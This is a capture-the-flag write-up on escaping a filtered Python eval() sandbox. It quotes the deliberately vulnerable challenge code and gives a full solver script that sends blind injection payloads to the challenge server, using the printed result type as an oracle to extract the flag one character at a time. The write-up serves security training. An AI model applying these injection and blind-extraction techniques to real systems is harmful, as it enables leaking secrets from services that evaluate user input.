[Hack The Box Write-Up: Type Exception]
Let's start with some context to understand the task and its solution. The task is a CTF (Capture The Flag) challenge, a format commonly used to test information-security skills. The primary objective is to extract the "flag", a hidden string.
General Overview of the Task
- We have server-side Python code that accepts a string from the user.
- This string is checked against a set of conditions.
- If the string meets all the conditions, it is passed to the eval() function for execution.
- We need to extract the hidden "flag" stored in a variable.
Now, let's look at the challenge code in more detail.
```python
import re

with open("./flag.txt") as f:
    FLAG = f.read().strip()

BLACKLIST = '"%&\',-/_:;@\\`{|}~*<=>[] \t\n\r\x0b\x0c'
OPEN_LIST = '('
CLOSE_LIST = ')'


def check_balanced(s):
    stack = []
    for i in s:
        if i in OPEN_LIST:
            stack.append(i)
        elif i in CLOSE_LIST:
            pos = CLOSE_LIST.index(i)
            if ((len(stack) > 0) and
                    (OPEN_LIST[pos] == stack[len(stack)-1])):
                stack.pop()
            else:
                return False
    return len(stack) == 0


def check(s):
    # Note: the first two tests read the global `inp` rather than `s`;
    # both hold the same string when check() is called from the main loop.
    if re.match(r"[a-zA-Z]{4}", inp):
        print("You return home.")
    elif len(set(re.findall(r"[\W]", inp))) > 4:
        print(set(re.findall(r"[\W]", inp)))
        print("A single man cannot bear the weight of all those special characters. You return home.")
    else:
        return all(ord(x) < 0x7f for x in s) and all(x not in s for x in BLACKLIST) and check_balanced(s)


def safe_eval(s, func):
    if not check(s):
        print("\U0001F6B6" + "\U0001F6B6" + "\U0001F6B6")
    else:
        try:
            # Only `type` is available as a builtin; the flag is exposed as `flag`
            print(eval(f"{func.__name__}({s})", {"__builtins__": {func.__name__: func}, "flag": FLAG}))
        except:
            print("Error")


if __name__ == "__main__":
    while True:
        inp = input("Input : ")
        safe_eval(inp, type)
```
First up, the function check_balanced checks that the parentheses in the string are balanced (every "(" is closed by a later ")"), returning True or False. Next, check applies its filters in order: it rejects any input that starts with four letters (re.match only matches at the beginning of the string); it rejects any input containing more than four distinct special characters; and only then does it require every character to be ASCII (below 0x7f), none to be on the blacklist, and the parentheses to be balanced. Last but not least, safe_eval is both the injection point and the last line of defense: if check fails, it prints three walking-person emojis; otherwise it evaluates type(<input>) with the builtins replaced by a dictionary containing only type and with the flag exposed as the variable flag, then prints the result, or "Error" if anything raises. The main loop then waits for the next input indefinitely.
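To try payloads offline before sending them, the filter can be replicated locally. The sketch below is a minimal approximation, assuming the server's BLACKLIST is exactly the string shown above; local_check is a hypothetical helper that reads s everywhere (where the original reads the global inp), and its counter-based balance test is equivalent to the stack version for a single kind of bracket:

```python
import re

# Copied from the challenge source; assumed identical to the server's list.
BLACKLIST = '"%&\',-/_:;@\\`{|}~*<=>[] \t\n\r\x0b\x0c'


def check_balanced(s: str) -> bool:
    """Return True if every ')' closes an earlier '(' and none stay open."""
    depth = 0
    for ch in s:
        if ch == "(":
            depth += 1
        elif ch == ")":
            if depth == 0:
                return False
            depth -= 1
    return depth == 0


def local_check(s: str) -> bool:
    """Offline replica of the server's check()."""
    if re.match(r"[a-zA-Z]{4}", s):
        return False  # input starts with four letters
    if len(set(re.findall(r"\W", s))) > 4:
        return False  # too many distinct special characters
    return (
        all(ord(ch) < 0x7F for ch in s)
        and all(ch not in s for ch in BLACKLIST)
        and check_balanced(s)
    )


if __name__ == "__main__":
    for payload in ["flag.encode()", "(1)if(flag.encode().index(0x41)is(0))else(None)"]:
        print(payload, local_check(payload))
```

Note that "flag.encode()" on its own is rejected because it starts with the four letters "flag", which is why every payload in the solution begins with "(".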
So, what are our constraints?
- Symbol restrictions: The blacklist includes spaces, commas, colons, quotes, square brackets, underscores and "=". That rules out string literals, indexing, dunder attributes, and ordinary statements like "if x == y:".
- Unique symbol limit: No more than four distinct special characters (anything matching the regex \W) may appear; for example, the string "((()))" contains only two: "(" and ")". This narrows down our choice of operators and functions.
- Exception handling: The server catches every exception and prints "Error", so we never see a traceback. We have to be careful with expressions that might raise, although, as we'll see, "Error" can also serve as a useful signal.
- Limited eval context: Only the type function and the flag variable are accessible, meaning functions and classes like list, print, set, str, dir, etc., are not available.
- Parentheses: They must be paired. "()" is acceptable; ")(" is not.
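The set of usable punctuation and the server's count of special characters can both be reproduced in a few lines. A sketch, assuming the BLACKLIST string copied from the challenge; special_chars is a hypothetical helper:

```python
import re
import string

BLACKLIST = '"%&\',-/_:;@\\`{|}~*<=>[] \t\n\r\x0b\x0c'

# Punctuation that survives the blacklist. All of it is ASCII,
# so the ord(x) < 0x7f test removes nothing further.
allowed = "".join(ch for ch in string.punctuation if ch not in BLACKLIST)
print(allowed)  # !#$()+.?^


def special_chars(payload: str) -> set[str]:
    """Distinct non-word characters, counted the way the server does."""
    return set(re.findall(r"\W", payload))


print(sorted(special_chars("((()))")))  # ['(', ')']
```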
And what can we do?
- Allowed symbols: The allowed symbols are !#$()+.?^.
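- Replace == with is: We can use "is" instead of "==" for comparison; for the small integers involved here, identity and equality coincide in CPython.
- Use hexadecimal numbers: Quotes are blacklisted, so string literals are out. Instead, we compare against the bytes of flag.encode(), which are integers, and write each character as its code point in hex (e.g., 0x41 for "A").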
- Class restriction workaround: list isn't in the eval context, but type(flag.split()) returns the list class, so we can call it to create a list instance.
- Types as responses: The server prints only the type of the evaluated expression. For example, 1 returns <class 'int'>.
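The building blocks above can be checked in a plain Python session. A sketch with a made-up flag value (the real one is unknown); note that is only behaves like == here because CPython caches the integers from -5 to 256, an implementation detail that happens to cover every index, count and ASCII code point this challenge needs:

```python
flag = "HTB{example}"  # hypothetical stand-in for the real flag

list_class = type(flag.split())  # str.split() returns a list, so this is the list class
code_points = flag.encode()      # bytes: indexing and iterating yield ints
target = 0x48                    # code point of "H", written without quotes

print(list_class)                         # <class 'list'>
print(code_points.index(target))          # 0
print(type(1), type(None))                # <class 'int'> <class 'NoneType'>

# CPython caches the ints -5..256, so "is" agrees with "==" for these values
# (comparing against a variable avoids the SyntaxWarning a literal would trigger)
zero = 0
print(code_points.index(target) is zero)  # True
```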
Let's get to the solution
This isn't a solution in a couple of lines of code: it uses several loops to extract the flag, and the brute force takes a while because every guess is a separate connection to the server. Here is the full solution:
```python
import socket
import string
import time
from collections import defaultdict
from enum import Enum
from typing import Optional

HOST, PORT = "164.92.147.43", 1337


class Answer(Enum):
    NO = 0
    YES = 1
    ERROR = 2


# Starting with "(" keeps re.match(r"[a-zA-Z]{4}") from firing; only "(", ")" and "." are used
if_construction = "(1)if({check})else(None)"


def netcat(content: bytes) -> Optional[Answer]:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((HOST, PORT))
    s.sendall(content + b"\n")  # end the line that input() reads
    s.shutdown(socket.SHUT_WR)
    # Read the full reply first, so a marker split across recv() calls is still found
    data = b""
    while True:
        chunk = s.recv(1024)
        if not chunk:
            break
        data += chunk
    s.close()
    if b"<class 'NoneType'>" in data:
        return Answer.NO
    if b"<class 'int'>" in data:
        return Answer.YES
    if b"Error" in data:
        return Answer.ERROR
    return None  # e.g. the payload was rejected by check()


def find_first_index(character, occupied):
    print("Finding first index: ", end="")
    for index in range(100):
        if index in occupied:
            continue
        print(".", end="")
        first_index_check = if_construction.format(check=f"flag.encode().index({character})is({index})").encode()
        result = netcat(first_index_check)
        if result == Answer.YES:
            print(f" {index}")
            return index
        if result == Answer.ERROR:
            # bytes.index() raised ValueError: the character is not in the flag
            print("Not used")
            return None
    return None


def find_last_index(character, start, occupied):
    print("Finding last index ", end="")
    for index in range(start + 1, 100):
        if index in occupied:
            continue
        print(".", end="")
        last_index_check = if_construction.format(check=f"flag.encode().rindex({character})is({index})").encode()
        result = netcat(last_index_check)
        if result == Answer.YES:
            print(f" {index}")
            return index
    return None


def find_in_between(character: str, first_index: int, last_index: int, count: int, occupied: list[int]) -> list[int]:
    print(f"Searching for {count - 2} indexes between {first_index} and {last_index}: ", end="")
    if (last_index - first_index + 1) == count:
        # Every position between the two edge indexes holds this character
        found_indexes = list(range(first_index + 1, last_index))
        print(", ".join(map(str, found_indexes)))
        return found_indexes
    # We need the list class to convert a generator to a list
    list_class = "type(flag.split())"
    # "Regular" generator that iterates over the flag's bytes
    flag_generator = "((i)for(i)in(flag.encode()))"
    # Converting the generator to a list
    flag_list = f"{list_class}({flag_generator})"
    found_indexes = []
    for char_index in range(first_index + 1, last_index):
        if char_index in occupied:
            # This index already holds a known character
            continue
        if len(found_indexes) + 2 == count:
            # All indexes for this character were found; no need to check the rest
            break
        print(".", end="")
        check_index = if_construction.format(check=f"{flag_list}.pop({char_index})is({character})").encode()
        result = netcat(check_index)
        if result == Answer.YES:
            print(f" {char_index}", end="")
            found_indexes.append(char_index)
    print()
    return found_indexes


def find_count(character):
    print("Finding count ", end="")
    for count in range(1, 20):
        print(".", end="")
        check_count = if_construction.format(check=f"flag.encode().count({character})is({count})").encode()
        result = netcat(check_count)
        if result == Answer.YES:
            print(f" {count}")
            return count
    return None


if __name__ == "__main__":
    start_time = time.time()
    occupied_indexes = []
    found_chars = defaultdict(dict)
    for char_str in string.printable:
        char_hex = hex(ord(char_str))
        print(f"\nChecking <{char_str} {char_hex}>")
        first_index = find_first_index(char_hex, occupied_indexes)
        if first_index is None:
            # This character is not present in the flag
            continue
        found_chars[char_str]["indexes"] = [first_index]
        occupied_indexes.append(first_index)
        # Check how many times this character occurs in the flag
        count = find_count(char_hex)
        found_chars[char_str]["count"] = count
        # If it occurs more than once, we can find its index from the end
        if count is not None and count > 1:
            last_index = find_last_index(char_hex, first_index, occupied_indexes)
            found_chars[char_str]["indexes"].append(last_index)
            occupied_indexes.append(last_index)
            # If it occurs more than twice, search between the first and last known index
            if count > 2:
                indexes = find_in_between(char_hex, first_index, last_index, count, occupied_indexes)
                found_chars[char_str]["indexes"] += indexes
                found_chars[char_str]["indexes"].sort()
                occupied_indexes += indexes
    # Flatten the dict into (index, char) pairs, sort them by index and join into the flag
    indexes = []
    for char_str, char_data in found_chars.items():
        for index in char_data["indexes"]:
            indexes.append((index, char_str))
    indexes.sort(key=lambda data: data[0])
    flag = "".join(char_str for _, char_str in indexes)
    print()
    print(flag)
    print(f"Finished in {round(time.time() - start_time)} sec.")
```
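To test the solver logic without hitting the remote instance, netcat could be replaced by a local stand-in that evaluates each payload the way safe_eval does and maps the resulting type to an Answer. This is a sketch under stated assumptions: the flag value is invented, the check() filter is skipped, and local_netcat is a hypothetical helper (the Answer enum repeats the script's so the block runs on its own):

```python
import warnings
from enum import Enum
from typing import Optional

FLAG = "HTB{example}"  # hypothetical flag, for offline testing only


class Answer(Enum):  # same members as the solver's Answer enum
    NO = 0
    YES = 1
    ERROR = 2


def local_netcat(content: bytes) -> Optional[Answer]:
    """Evaluate a payload like safe_eval does (minus check()) and classify the result."""
    scope = {"__builtins__": {"type": type}, "flag": FLAG}
    try:
        with warnings.catch_warnings():
            # "x is 0" with a literal emits a SyntaxWarning on Python 3.8+
            warnings.simplefilter("ignore", SyntaxWarning)
            result_type = type(eval(content.decode(), scope))
    except Exception:
        return Answer.ERROR  # the server would print "Error"
    if result_type is int:
        return Answer.YES
    if result_type is type(None):
        return Answer.NO
    return None


print(local_netcat(b"(1)if(flag.encode().index(0x48)is(0))else(None)"))  # Answer.YES
```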
First step
We kick off by checking for the letter 'A' (hex '0x41') in the flag string and whether it's at index 0.
Injection: (1)if(flag.encode().index(0x41)is(0))else(None)
Readable: 1 if flag.encode().index(0x41) is 0 else None
Server responses: an integer means it's at index 0; 'NoneType' means it's elsewhere; 'Error' means it's not in the string at all.
Second step
We count how many times 'A' (hex '0x41') appears in the string.
Injection: (1)if(flag.encode().count(0x41)is(1))else(None)
Readable: 1 if flag.encode().count(0x41) is 1 else None
Server responses: an integer confirms the count; 'NoneType' means the count is different, so we try the next one.
Third step
Once a character's first index and count are known, and the count is greater than one, we look for its last index.
Injection: (1)if(flag.encode().rindex(0x41)is(0))else(None)
Readable: 1 if flag.encode().rindex(0x41) is 0 else None
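Note: Upon reflection, this step may be redundant: knowing the first index and the count suffices, because the fourth-step search could simply scan every position after the first index and stop once all occurrences are found.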
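The redundancy is easy to see: find_last_index already walks upward from the first index one request at a time, and for characters that occur more than twice, find_in_between then revisits positions it already passed. A sketch of a single-pass alternative, assuming a hypothetical is_target_at callable that stands in for one .pop(index) request; it leaves out the occupied-index bookkeeping of the original script:

```python
from typing import Callable, List


def positions_without_rindex(
    is_target_at: Callable[[int], bool], first: int, count: int, limit: int = 100
) -> List[int]:
    """Locate all `count` occurrences of a character, given its first index.

    `is_target_at(index)` stands in for one request with the .pop(index)
    payload from the fourth step; here it is any callable (hypothetical).
    """
    found = [first]
    for index in range(first + 1, limit):
        if len(found) == count:
            break  # every occurrence is known; stop sending requests
        if is_target_at(index):
            found.append(index)
    return found


# Local usage with a made-up flag: "a" occurs at indexes 4, 5 and 7
flag = b"HTB{aaXa}"
code = ord("a")
print(positions_without_rindex(lambda i: i < len(flag) and flag[i] == code, flag.index(code), flag.count(code)))
# [4, 5, 7]
```

Each position is visited at most once, and the loop ends as soon as the last occurrence has been found.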
Fourth step
For characters that appear more than twice, we brute-force the remaining positions between the first and last index.
Injection: (1)if(type(flag.split())(((i)for(i)in(flag.encode()))).pop(1)is(0x41))else(None)
Readable: 1 if type(flag.split())(i for i in flag.encode()).pop(1) is 0x41 else None
How it works:
- type(flag.split()) returns the list class, since list itself isn't in the eval context.
- (i)for(i)in(flag.encode()) is a generator over the flag's bytes (integers), which the list class turns into a list.
- .pop({char_index})is({character}) takes the element at the candidate index and compares it with the character's code point (0x41 above).
This way, we can brute-force the remaining unknown positions one index at a time and reconstruct the whole flag.
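The list trick from the fourth step can be reproduced locally. A sketch with a made-up flag; it also suggests the generator is not strictly required, since the list class accepts bytes directly (type(flag.split())(flag.encode()) uses the same three special characters):

```python
flag = "HTB{example}"  # hypothetical stand-in for the real flag

list_class = type(flag.split())  # the list class, reached without the name "list"

# The write-up's form: a generator over the flag's bytes, materialised as a list
from_generator = list_class((i) for (i) in flag.encode())
# Equivalent: list() accepts any iterable, and bytes already iterate as ints
direct = list_class(flag.encode())
print(from_generator == direct)  # True

target = 0x54                              # code point of "T"
popped = list_class(flag.encode()).pop(1)  # fresh list, as every payload builds one
print(popped is target)                    # True (small ints are cached in CPython)
```

pop() removes the element it returns, which is harmless here because each request evaluates a brand-new list.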